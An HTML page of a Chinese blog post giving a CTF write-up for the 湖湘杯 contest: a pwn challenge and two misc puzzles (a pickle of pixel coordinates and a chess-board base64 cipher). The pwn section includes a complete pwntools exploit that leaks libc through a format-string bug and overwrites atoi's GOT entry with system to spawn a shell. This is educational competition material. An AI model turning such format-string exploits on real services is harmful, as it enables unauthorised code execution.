<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,writeup,misc,pwn," />










<meta name="description" content="湖湘杯线上ctf--复赛">
<meta name="keywords" content="ctf,writeup,misc,pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="湖湘杯部分题writeup">
<meta property="og:url" content="https://d001um3.github.io/2017/11/27/hxb/index.html">
<meta property="og:site_name" content="D001UM3&#39;S BLOG">
<meta property="og:description" content="湖湘杯线上ctf--复赛">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/4c94d4f5bb81dcc8c034ffd6a598a2f1.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/a5d64b14648b7864716023ff69409106.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/bfe0013d76729586beec725283aed865.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/65ac2db20daccaf1cd4979c49995e66b.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/11edccf02ec3971392c058eb0f21896a.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/2b3f529b0b9c59e06cb907846ea71854.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/ec9fa9585a3cb2d3caf62598a4214af2.png">
<meta property="og:updated_time" content="2017-11-30T19:25:37.155Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="湖湘杯部分题writeup">
<meta name="twitter:description" content="湖湘杯线上ctf--复赛">
<meta name="twitter:image" content="http://oztni9daw.bkt.clouddn.com/4c94d4f5bb81dcc8c034ffd6a598a2f1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"right","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://d001um3.github.io/2017/11/27/hxb/"/>





  <title>湖湘杯部分题writeup | D001UM3'S BLOG</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">D001UM3'S BLOG</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://d001um3.github.io/2017/11/27/hxb/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="D001UM3">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/head.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="D001UM3'S BLOG">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">湖湘杯部分题writeup</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-11-27T00:23:44+08:00">
                2017-11-27
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index">
                    <span itemprop="name">ctf</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          
              <div class="post-description">
                  湖湘杯线上ctf--复赛
              </div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>湖湘杯这次放了4个pwn题，一共1000分，对于我这个pwn新手太不友好了，一下午只做了个200分的。misc大部分都是原题，google hack大法好</p>
<h1 id="Pwne"><a href="#Pwne" class="headerlink" title="Pwne"></a>Pwne</h1><p>题目给了一个ELF和libc.so.6，先查下安全保护，有nx和canary</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/4c94d4f5bb81dcc8c034ffd6a598a2f1.png" alt="pwne"></p>
<p>ida打开看一下</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/a5d64b14648b7864716023ff69409106.png" alt="ida"></p>
<p>很明显的格式化字符串漏洞，但是以前只是了解过格式化字符串漏洞，遇到从来没做出来过，这次其他pwn题好像又都很难，就花了一下午解出了第一个格式化字符串漏洞的pwn题</p>
<p>题目给了一个libc.so.6，很明显需要泄漏libc的地址了。这里我们进行两次循环，第一次泄漏libc的地址，第二次修改atoi的地址为system，然后传入’/bin/sh’就能拿到shell了，</p>
<p>这里的格式化字符串的参数偏移为7，payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">elf = ELF(&apos;pwne&apos;)</span><br><span class="line">p32(elf.got[&apos;puts&apos;]) + &apos;%7$s&apos;</span><br></pre></td></tr></table></figure>
<p>这里泄漏puts函数的地址，然后就能通过libc文件算出libc的基地址，进而算出system的地址</p>
<blockquote>
<p>题外话，原来ELF的动态链接时，采用了延迟绑定技术，超坑的，开始一直泄漏的是atoi的地址，因为atoi只有每次输入age后调用，导致我第一次泄漏得到的地址是个”假地址”，浪费了半个下午，gdb各种下断点看，就是没看出来，后面换成泄漏puts的地址，一下就成功了，卧槽</p>
</blockquote>
<p>exp：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">context.terminal = [&apos;gnome-terminal&apos;,&apos;-x&apos;,&apos;sh&apos;,&apos;-c&apos;]</span><br><span class="line">elf = ELF(&apos;pwne&apos;)</span><br><span class="line"># libc = ELF(&apos;libc.so.6&apos;)</span><br><span class="line">libc = ELF(&apos;/lib32/libc.so.6&apos;)</span><br><span class="line">sh = process(&apos;pwne&apos;)</span><br><span class="line"># sh = remote(&apos;114.215.133.230&apos;, 10080)</span><br><span class="line">sh.recvuntil(&apos;\n&apos;)</span><br><span class="line">sh.sendline(&apos;Y&apos;)</span><br><span class="line">sh.recvuntil(&apos;\n\n&apos;)</span><br><span class="line">sh.sendline(p32(elf.got[&apos;puts&apos;]) + &apos;%7$s&apos;)</span><br><span class="line">sh.recvuntil(&apos;\n&apos;)</span><br><span class="line">atoi_addr = sh.recv()</span><br><span class="line">atoi_addr = atoi_addr[4:8]</span><br><span class="line">system_addr = libc.symbols[&apos;system&apos;] - libc.symbols[&apos;puts&apos;] + u32(atoi_addr)</span><br><span class="line">atoi_got = elf.got[&apos;atoi&apos;]</span><br><span class="line">sh.sendline(&apos;1&apos;)</span><br><span class="line">sh.recvuntil(&apos;\n&apos;)</span><br><span class="line">sh.sendline(&apos;Y&apos;)</span><br><span class="line">sh.recvuntil(&apos;\n\n&apos;)</span><br><span class="line">sh.sendline(fmtstr_payload(7, &#123;atoi_got: system_addr&#125;))</span><br><span class="line">sh.recvuntil(&apos;GET YOUR AGE:\n\n&apos;)</span><br><span class="line">sh.sendline(&apos;/bin/sh\x00&apos;)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="http://oztni9daw.bkt.clouddn.com/bfe0013d76729586beec725283aed865.png" alt="exp"></p>
<h1 id="Misc300"><a href="#Misc300" class="headerlink" title="Misc300"></a>Misc300</h1><p>Python pkl文件，百度pkl，然后用python解一下得到一串像素点</p>
<blockquote>
<p>‘The black pixels of a b/w image are at’, (15, 200), (21, 308), (23, 310), (24, 314),……（略）</p>
</blockquote>
<p>按提示白底黑点画出来</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/65ac2db20daccaf1cd4979c49995e66b.png" alt="misc300"></p>
<p>excuse me？what f**k？</p>
<p>而且这是自己画出来的，也不可能存在隐写什么情况，无多余提示，瞬间思想jiang化了许久，然后一想pkl这种文件，平时听都没听过，所以直接google关键字：</p>
<blockquote>
<p>ctf pkl</p>
</blockquote>
<p>卧槽，原题，flag都是贴出来了，美滋滋，链接：<a href="https://github.com/shiltemann/CTF-writeups-public/blob/master/Pragyan_2016/writeup.md" target="_blank" rel="noopener">拉到最下面一个题</a></p>
<p>flag就是小男孩的名字</p>
<blockquote>
<p>billwatterson</p>
</blockquote>
<p>这个什么鬼动漫Calvin and Hobbes，从没听过，人物还是这种像素点画出来的，之前谷歌搜图都搜不出来，没看过这动漫的感觉都做不出来，还好有原题</p>
<h1 id="热身运动"><a href="#热身运动" class="headerlink" title="热身运动"></a>热身运动</h1><p><img src="http://oztni9daw.bkt.clouddn.com/11edccf02ec3971392c058eb0f21896a.png" alt="shouhu"></p>
<p>之前的题是一个龙猫，看了他跳了几小时，都看不出来这龙猫哪里有问题，然后主办方换题了，又换了一个瘦虎跳来跳去，然后分析一波gif还是没有问题</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/2b3f529b0b9c59e06cb907846ea71854.png" alt="ph"></p>
<p>然后一帧一帧看瘦虎跳的坐标，记录下来：</p>
<blockquote>
<p>5b4g2b4b5b2h3e2b5f8f1e2b7f6f1f4g5f6g1b3g5g6h2e</p>
</blockquote>
<p>棋盘是国际象棋的棋盘a-h，1-8的，横8竖8，8*8=64，联想到base64，从左上角为0开始，代表0-63，python解一下</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/ec9fa9585a3cb2d3caf62598a4214af2.png" alt="rsyd"></p>
<blockquote>
<p>flag{1t_15_funny}</p>
</blockquote>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
            <a href="/tags/writeup/" rel="tag"># writeup</a>
          
            <a href="/tags/misc/" rel="tag"># misc</a>
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/11/24/Jarvis_pwn_1/" rel="next" title="Jarvis OJ -- pwn题（上）">
                <i class="fa fa-chevron-left"></i> Jarvis OJ -- pwn题（上）
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/11/27/Jarvis_crypto_1/" rel="prev" title="Jarvis OJ -- crypto题（上）">
                Jarvis OJ -- crypto题（上） <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/head.png"
                alt="D001UM3" />
            
              <p class="site-author-name" itemprop="name">D001UM3</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">18</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Pwne"><span class="nav-number">1.</span> <span class="nav-text">Pwne</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Misc300"><span class="nav-number">2.</span> <span class="nav-text">Misc300</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#热身运动"><span class="nav-number">3.</span> <span class="nav-text">热身运动</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">D001UM3</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
